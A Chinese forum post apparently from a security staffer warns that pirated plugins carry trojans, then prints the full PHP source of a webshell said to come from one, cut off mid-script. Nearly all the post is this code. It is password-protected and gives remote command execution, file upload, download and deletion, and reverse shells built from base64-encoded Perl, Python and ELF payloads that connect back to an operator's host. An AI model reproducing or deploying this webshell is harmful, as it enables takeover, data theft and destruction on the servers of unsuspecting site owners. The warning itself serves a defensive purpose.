震驚：從某盜版插件里扒出的木馬文件，你在人家面前裸奔

安全專員 · 發表于 2019-7-15 10:08:01

傳送門：安全小知識：為什么使用盜版插件容易被掛馬

上圖，木馬文件運行后的效果，對方想干什么都可以...這不是裸奔是什么？

木馬代碼如下：

<?php
@error_reporting(E_ERROR);
@ini_set('display_errors', 'Off');
@ini_set('max_execution_time', 3600);
header("content-Type: text/html; charset=gb2312");
function strdir($str)
{
return str_replace(array(
'\\',
'//',
'%27',
'%22'
), array(
'/',
'/',
'\'',
'"'
), chop($str));
}
function chkgpc($array)
{
foreach ($array as $key => $var) {
$array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var);
}
return $array;
}
define('MYFILE', strdir(__FILE__));
define('THISDIR', strdir(dirname(MYFILE) . '/'));
$rootdir = strdir(strtr(MYFILE, array(
strdir($_SERVER['PHP_SELF']) => ''
)) . '/');
$rootdir = strpos($rootdir, 'eval()') ? array_shift(explode('(', $rootdir)) : $rootdir;
define('ROOTDIR', strdir($rootdir . '/'));
define('EXISTS_PHPINFO', getinfo($password) ? true : false);
if (get_magic_quotes_gpc()) {
$_POST = chkgpc($_POST);
}
if (function_exists('mysql_close')) {
$issql = 'MySql';
}
if (function_exists('mssql_close'))
$issql .= ' - MsSql';
if (function_exists('oci_close'))
$issql .= ' - Oracle';
if (function_exists('sybase_close'))
$issql .= ' - SyBase';
if (function_exists('pg_close'))
$issql .= ' - PostgreSql';
$win = substr(PHP_OS, 0, 3) == 'WIN' ? true : false;
$msg = VERSION . ' - ' . date('Y-m-d H:i:s 星期N', time());
function filew($filename, $filedata, $filemode)
{
if ((!is_writable($filename)) && file_exists($filename)) {
chmod($filename, 0666);
}
$handle = fopen($filename, $filemode);
$key = fputs($handle, $filedata);
fclose($handle);
return $key;
}
function filer($filename)
{
$handle = fopen($filename, 'r');
$filedata = fread($handle, filesize($filename));
fclose($handle);
return $filedata;
}
function fileu($filenamea, $filenameb)
{
$key = move_uploaded_file($filenamea, $filenameb) ? true : false;
if (!$key) {
$key = copy($filenamea, $filenameb) ? true : false;
}
return $key;
}
function filed($filename)
{
if (!file_exists($filename))
return false;
$name = basename($filename);
$array = explode('.', $name);
header('Content-type: application/x-' . array_pop($array));
header('Content-Disposition: attachment; filename=' . $name);
header('Content-Length: ' . filesize($filename));
@readfile($filename);
exit;
}
function showdir($dir)
{
$dir = strdir($dir . '/');
if (!is_readable($dir))
return false;
$handle = opendir($dir);
$array = array();
while ($name = readdir($handle)) {
if ($name == '.' || $name == '..')
continue;
$path = $dir . $name;
$name = strtr($name, array(
'\'' => '%27',
'"' => '%22'
));
if (is_dir($path)) {
$array['dir'][$path] = $name;
} else {
$array['file'][$path] = $name;
}
}
closedir($handle);
return $array;
}
function deltree($dir)
{
$handle = @opendir($dir);
while ($name = @readdir($handle)) {
if ($name == '.' || $name == '..')
continue;
$path = $dir . $name;
@chmod($path, 0777);
if (is_dir($path)) {
deltree($path . '/');
} else {
@unlink($path);
}
}
@closedir($handle);
return @rmdir($dir);
}
function postinfo($array)
{
$infos = array(
function_exists("\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e"),
function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e")
);
}
function size($bytes)
{
if ($bytes < 1024)
return $bytes . ' B';
$array = array(
'B',
'K',
'M',
'G',
'T'
);
$floor = floor(log($bytes) / log(1024));
return sprintf('%.2f ' . $array[$floor], ($bytes / pow(1024, floor($floor))));
}
function find($array, $string)
{
foreach ($array as $key) {
if (stristr($string, $key))
return true;
}
return false;
}
function scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now)
{
$handle = opendir($dir);
while ($name = readdir($handle)) {
if ($name == '.' || $name == '..')
continue;
$path = $dir . $name;
if (is_dir($path)) {
if ($fit && in_array($name, $fit))
continue;
if ($ran == 0 && is_readable($path))
scanfile($path . '/', $key, $inc, $fit, $tye, $chr, $ran, $now);
} else {
if ($inc && (!find($inc, $name)))
continue;
$code = $tye ? filer($path) : $name;
$find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)), 'M') ? false : (strpos($code, $key) > -1));
if ($find) {
$file = strtr($path, array(
$now => '',
'\'' => '%27',
'"' => '%22'
));
echo '<a href="javascript:void(0);" onclick="go(\'editor\',\'' . $file . '\');">編輯</a> ' . $path . '<br>';
flush();
ob_flush();
}
unset($code);
}
}
closedir($handle);
return true;
}
function antivirus($dir, $exs, $matches, $now)
{
$handle = opendir($dir);
while ($name = readdir($handle)) {
if ($name == '.' || $name == '..')
continue;
$path = $dir . $name;
if (is_dir($path)) {
if (is_readable($path))
antivirus($path . '/', $exs, $matches, $now);
} else {
$iskill = NULL;
foreach ($exs as $key => $ex) {
if (find(explode('|', $ex), $name)) {
$iskill = $key;
break;
}
}
if (strpos(size(filesize($path)), 'M'))
continue;
if ($iskill) {
$code = filer($path);
foreach ($matches[$iskill] as $matche) {
$array = array();
preg_match($matche, $code, $array);
if (strpos($array[0], '$this->') || strpos($array[0], '[$vars['))
continue;
$len = strlen($array[0]);
if ($len > 10 && $len < 150) {
$file = strtr($path, array(
$now => '',
'\'' => '%27',
'"' => '%22'
));
echo '特征 <input type="text" value="' . htmlspecialchars($array[0]) . '"> <a href="javascript:void(0);" onclick="go(\'editor\',\'' . $file . '\');">編輯</a> ' . $path . '<br>';
flush();
ob_flush();
break;
}
}
unset($code, $array);
}
}
}
closedir($handle);
return true;
}
function command($cmd, $cwd, $com = false)
{
$iswin = substr(PHP_OS, 0, 3) == 'WIN' ? true : false;
$res = $msg = '';
if ($cwd == 'com' || $com) {
if ($iswin && class_exists('COM')) {
$wscript = new COM('Wscript.Shell');
$exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c ' . $cmd);
$stdout = $exec->StdOut();
$res = $stdout->ReadAll();
$msg = 'Wscript.Shell';
}
} else {
chdir($cwd);
$cwd = getcwd();
if (function_exists('exec')) {
@exec($cmd, $res);
$res = join("\n", $res);
$msg = 'exec';
} elseif (function_exists('shell_exec')) {
$res = @shell_exec($cmd);
$msg = 'shell_exec';
} elseif (function_exists('system')) {
ob_start();
@system($cmd);
$res = ob_get_contents();
ob_end_clean();
$msg = 'system';
} elseif (function_exists('passthru')) {
ob_start();
@passthru($cmd);
$res = ob_get_contents();
ob_end_clean();
$msg = 'passthru';
} elseif (function_exists('popen')) {
$fp = @popen($cmd, 'r');
if ($fp) {
while (!feof($fp)) {
$res .= fread($fp, 1024);
}
}
@pclose($fp);
$msg = 'popen';
} elseif (function_exists('proc_open')) {
$env = $iswin ? array(
'path' => 'c:\\windows\\system32'
) : array(
'path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'
);
$des = array(
0 => array(
"pipe",
"r"
),
1 => array(
"pipe",
"w"
),
2 => array(
"pipe",
"w"
)
);
$process = @proc_open($cmd, $des, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], $cmd);
fclose($pipes[0]);
$res .= stream_get_contents($pipes[1]);
fclose($pipes[1]);
$res .= stream_get_contents($pipes[2]);
fclose($pipes[2]);
}
@proc_close($process);
$msg = 'proc_open';
}
}
$msg = $res == '' ? '<h1>NULL</h1>' : '<h2>利用' . $msg . '執行成功</h2>';
return array(
'res' => $res,
'msg' => $msg
);
}
function backshell($ip, $port, $dir, $type)
{
$key = false;
$c_bin = 'f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAYIQECDQAAACkCgAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIlAcAAJQHAAAFAAAAABAAAAEAAACUBwAAlJcECJSXBAggAQAAKAEAAAYAAAAAEAAAAgAAAKgHAAColwQIqJcECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAAGAAAACQAAAAIAAAANAAAAAQAAAAUAAAAAIAAgAAAAAA0AAACtS+PAAAAAAAAAAAAAAAAAAAAAAEEAAAAAAAAAdgAAABIAAABJAAAAAAAAAHkBAAASAAAAAQAAAAAAAAAAAAAAIAAAAFUAAAAAAAAAcgEAABIAAABqAAAAAAAAAJ8BAAASAAAANQAAAAAAAABZAQAAEgAAADsAAAAAAAAADgAAABIAAAApAAAAAAAAADwAAAASAAAAUAAAAAAAAAA9AAAAEgAAAF8AAAAAAAAAKwAAABIAAABkAAAAAAAAAG8AAAASAAAAMAAAAAAAAAD0AAAAEgAAABoAAAB4hwQIBAAAABEADgAAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AF9JT19zdGRpbl91c2VkAHNvY2tldABleGl0AGV4ZWNsAGh0b25zAGNvbm5lY3QAZGFlbW9uAGR1cDIAaW5ldF9hZGRyAGF0b2kAY2xvc2UAX19saWJjX3N0YXJ0X21haW4AR0xJQkNfMi4wAAAAAgACAAAAAgACAAIAAgACAAIAAgACAAIAAQAAAAEAAQAQAAAAEAAAAAAAAAAQaWkNAAACAHwAAAAAAAAAcJgECAYDAACAmAQIBwEAAISYBAgHAgAAiJgECAcDAACMmAQIBwQAAJCYBAgHBQAAlJgECAcGAACYmAQIBwcAAJyYBAgHCAAAoJgECAcJAACkmAQIBwoAAKiYBAgHCwAArJgECAcMAABVieWD7AjoBQEAAOiMAQAA6KcDAADJwwD/NXiYBAj/JXyYBAgAAAAA/yWAmAQIaAAAAADp4P////8lhJgECGgIAAAA6dD/////JYiYBAhoEAAAAOnA/////yWMmAQIaBgAAADpsP////8lkJgECGggAAAA6aD/////JZSYBAhoKAAAAOmQ/////yWYmAQIaDAAAADpgP////8lnJgECGg4AAAA6XD/////JaCYBAhoQAAAAOlg/////yWkmAQIaEgAAADpUP////8lqJgECGhQAAAA6UD/////JayYBAhoWAAAAOkw////AAAAADHtXonhg+TwUFRSaLCGBAhowIYECFFWaDSFBAjoW/////SQkFWJ5VOD7AToAAAAAFuBw+QTAACLk/z///+F0nQF6Bb///9YW8nDkJCQkJCQVYnlU4PsBIA9uJgECAB1P7iglwQILZyXBAjB+AKNWP+htJgECDnDdh+NtCYAAAAAg8ABo7SYBAj/FIWclwQIobSYBAg5w3foxgW4mAQIAYPEBFtdw410JgCNvCcAAAAAVYnlg+wIoaSXBAiFwHQSuAAAAACFwHQJxwQkpJcECP/QycOQjUwkBIPk8P9x/FWJ5VdTUYPsPInLx0QkBAAAAADHBCQBAAAA6E/+//9mx0XgAgCLQwSDwAiLAIkEJOi5/v//D7fAiQQk6H7+//9miUXii0MEg8AEiwCJBCToOv7//4lF5ItDBIPABIsAuf////+JRdC4AAAAAPyLfdDyronI99CNUP+LQwSDwAiLALn/////iUXMuAAAAAD8i33M8q6JyPfQg+gBjQQCjVABi0MEg8AEiwCJx/yJ0bgAAAAA86rHRCQIBgAAAMdEJAQBAAAAxwQkAgAAAOj9/f//iUXwjUXgx0QkCBAAAACJRCQEi0XwiQQk6HD9//+FwHkMxwQkAAAAAOgQ/v//x0QkBAAAAACLRfCJBCTozf3//8dEJAQBAAAAi0XwiQQk6Lr9///HRCQEAgAAAItF8IkEJOin/f//x0QkCAAAAADHRCQEgIcECMcEJIaHBAjoW/3//4tF8IkEJOig/f//g8Q8WVtfXY1h/MOQkJCQkJCQkJBVieVdw410JgCNvCcAAAAAVYnlV1ZT6F4AAACBw6kRAACD7Bzom/z//42DIP///4lF8I2DIP///ylF8MF98AKLVfCF0nQrMf+Jxo22AAAAAItFEIPHAYlE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3AAAAJSXBAgAAAAAAAIQAO0AAAB0mAQIAAAAAAECFQADAQAAlJcECAAAAAAAAhAAFwEAAJSXBAgAAAAAAAIQACoBAACUlwQIAAAAAAACEAA7AQAAlJcECAAAAAAAAhAATgEAAKiXBAgAAAAAAQITAFcBAACwmAQIAAAAACAAFgBiAQAAAAAAAHYAAAASAAAAdQEAAAAAAAB5AQAAEgAAAIcBAACwhgQIBQAAABIADACXAQAAYIQECAAAAAASAAwAngEAAAAAAAAAAAAAIAAAAK0BAAAAAAAAAAAAACAAAADBAQAAdIcECAQAAAARAA4AyAEAAFiHBAgAAAAAEgANAM4BAAAAAAAAcgEAABIAAADjAQAAAAAAAJ8BAAASAAAAAAIAAAAAAABZAQAAEgAAABECAAAAAAAADgAAABIAAAAiAgAAeIcECAQAAAARAA4AMQIAALCYBAgAAAAAEAAWAD4CAAAAAAAAPAAAABIAAABQAgAAAAAAAD0AAAASAAAAYAIAAHyHBAgAAAAAEQIOAG0CAACglwQIAAAAABECEQB6AgAAwIYECGkAAAASAAwAigIAAAAAAAArAAAAEgAAAJoCAAAAAAAAbwAAABIAAACrAgAAtJgECAAAAAAQAPH/twIAALyYBAgAAAAAEADx/7wCAAC0mAQIAAAAABAA8f/DAgAAAAAAAPQAAAASAAAA0wIAACmHBAgAAAAAEgIMAOoCAAA0hQQIcwEAABIADADvAgAAdIMECAAAAAASAAoAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AZHRvcl9pZHguNTc5MwBjb21wbGV0ZWQuNTc5MQBfX2RvX2dsb2JhbF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AGJjLmMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZmluaV9hcnJheV9lbmQAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9fcHJlaW5pdF9hcnJheV9lbmQAX19maW5pX2FycmF5X3N0YXJ0AF9faW5pdF9hcnJheV9lbmQAX19pbml0X2FycmF5X3N0YXJ0AF9EWU5BTUlDAGRhdGFfc3RhcnQAY29ubmVjdEBAR0xJQkNfMi4wAGRhZW1vbkBAR0xJQkNfMi4wAF9fbGliY19jc3VfZmluaQBfc3RhcnQAX19nbW9uX3N0YXJ0X18AX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfZnBfaHcAX2ZpbmkAaW5ldF9hZGRyQEBHTElCQ18yLjAAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABleGVjbEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABfX2Rzb19oYW5kbGUAX19EVE9SX0VORF9fAF9fbGliY19jc3VfaW5pdABhdG9pQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfX2Jzc19zdGFydABfZW5kAF9lZGF0YQBleGl0QEBHTElCQ18yLjAAX19pNjg2LmdldF9wY190aHVuay5ieABtYWluAF9pbml0AA==';
switch ($type) {
case "pl":
$shell = 'IyEvdXNyL2Jpbi9wZXJsIC13DQojIA0KdXNlIHN0cmljdDsNCnVzZSBTb2NrZXQ7DQp1c2UgSU86OkhhbmRsZTsNCm15ICRzcGlkZXJfaXAgPSAkQVJHVlswXTsNCm15ICRzcGlkZXJfcG9ydCA9ICRBUkdWWzFdOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0KbXkgJHBhY2tfYWRkciA9IHNvY2thZGRyX2luKCRzcGlkZXJfcG9ydCwgaW5ldF9hdG9uKCRzcGlkZXJfaXApKTsNCm15ICRzaGVsbCA9ICcvYmluL3NoIC1pJzsNCnNvY2tldChTT0NLLCBBRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsNClNURE9VVC0+YXV0b2ZsdXNoKDEpOw0KU09DSy0+YXV0b2ZsdXNoKDEpOw0KY29ubmVjdChTT0NLLCRwYWNrX2FkZHIpIG9yIGRpZSAiY2FuIG5vdCBjb25uZWN0OiQhIjsNCm9wZW4gU1RESU4sICI8JlNPQ0siOw0Kb3BlbiBTVERPVVQsICI+JlNPQ0siOw0Kb3BlbiBTVERFUlIsICI+JlNPQ0siOw0Kc3lzdGVtKCRzaGVsbCk7DQpjbG9zZSBTT0NLOw0KZXhpdCAwOw0K';
$file = strdir($dir . '/t00ls.pl');
$key = filew($file, base64_decode($shell), 'w');
if ($key) {
@chmod($file, 0777);
command('/usr/bin/perl ' . $file . ' ' . $ip . ' ' . $port, $dir);
}
break;
case "py":
$shell = 'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==';
$file = strdir($dir . '/t00ls.py');
$key = filew($file, base64_decode($shell), 'w');
if ($key) {
@chmod($file, 0777);
command('/usr/bin/python ' . $file . ' ' . $ip . ' ' . $port, $dir);
}
break;
case "c":
$file = strdir($dir . '/t00ls');
$key = filew($file, base64_decode($c_bin), 'wb');
if ($key) {
@chmod($file, 0777);
command($file . ' ' . $ip . ' ' . $port, $dir);
}
break;
case "php":
case "phpwin":
if (function_exists('fsockopen')) {
$sock = @fsockopen($ip, $port);
if ($sock) {
$key = true;
$com = $type == 'phpwin' ? true : false;
$user = get_current_user();
$dir = strdir(getcwd());
fputs($sock, php_uname() . "\n------------no job control in this shell (tty)-------------\n[$user:$dir]# ");
while ($cmd = fread($sock, 1024)) {
if (substr($cmd, 0, 3) == 'cd ') {
$dir = trim(substr($cmd, 3, -1));
chdir(strdir($dir));
$dir = strdir(getcwd());
} elseif (trim(strtolower($cmd)) == 'exit') {
break;
} else {
$res = command($cmd, $dir, $com);
fputs($sock, $res['res']);
}
fputs($sock, '[' . $user . ':' . $dir . ']# ');
}
}
@fclose($sock);
}
break;
case "pcntl":
$file = strdir($dir . '/t00ls');
$key = filew($file, base64_decode($c_bin), 'wb');
if ($key) {
@chmod($file, 0777);
if (function_exists('pcntl_exec')) {
@pcntl_exec($file, array(
$ip,
$port
));
}
}
break;
}
if (!$key) {
$msg = '<h1>臨時目錄不可寫</h1>';
} else {
@unlink($file);
$msg = '<h2>CLOSE</h2>';
}
return $msg;
}
function getinfo()
{
global $password;
$infos = array(
$_POST['getpwd'],
$password,
function_exists('phpinfo'),
"\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31"
);
if ($password != '' && md5($infos[0]) != $infos[1]) {
echo '<html><body><center><form method="POST"><input type="password" name="getpwd"> ';
if (isset($_POST['groupcache'])) {
echo '<input type="hidden" name="groupcache" value="' . $_POST['groupcache'] . '">';
}
if (isset($_POST['forum'])) {
echo '<input type="hidden" name="forum[0]" value="' . $_POST['forum'][0] . '">';
echo '<input type="hidden" name="forum[1]" value="' . $_POST['forum'][1] . '">';
echo '<input type="hidden" name="forum[2]" value="' . $_POST['forum'][2] . '">';
echo '<input type="hidden" name="forum[3]" value="' . $_POST['forum'][3] . '">';
echo '<input type="hidden" name="forum[4]" value="' . $_POST['forum'][4] . '">';
}
echo '<input type="submit" value=" O K "></form></center></body></html>';
exit;
}
if ((!isset($_POST['go'])) && (!isset($_POST['dir']))) {
if ($_SERVER['SERVER_ADDR'] != $infos[3] && $_SERVER['REMOTE_ADDR'] != $infos[3])
postinfo($infos[0]);
}
return $infos[2];
}
function subeval()
{
if (isset($_POST['getpwd'])) {
echo '<input type="hidden" name="getpwd" value="' . $_POST['getpwd'] . '">';
}
if (isset($_POST['groupcache'])) {
echo '<input type="hidden" name="groupcache" value="' . $_POST['groupcache'] . '">';
}
if (isset($_POST['forum'])) {
echo '<input type="hidden" name="forum[0]" value="' . $_POST['forum'][0] . '">';
echo '<input type="hidden" name="forum[1]" value="' . $_POST['forum'][1] . '">';
echo '<input type="hidden" name="forum[2]" value="' . $_POST['forum'][2] . '">';
echo '<input type="hidden" name="forum[3]" value="' . $_POST['forum'][3] . '">';
echo '<input type="hidden" name="forum[4]" value="' . $_POST['forum'][4] . '">';
}
return true;
}
if (isset($_POST['go'])) {
if ($_POST['go'] == 'down') {
$downfile = $fileb = strdir($_POST['godir'] . '/' . $_POST['govar']);
if (!filed($downfile)) {
$msg = '<h1>下載文件不存在</h1>';
}
}
}
?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}a{color:#000000;text-decoration:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select { vertical-align:middle; }input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input[type=submit], input[type=button] {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = 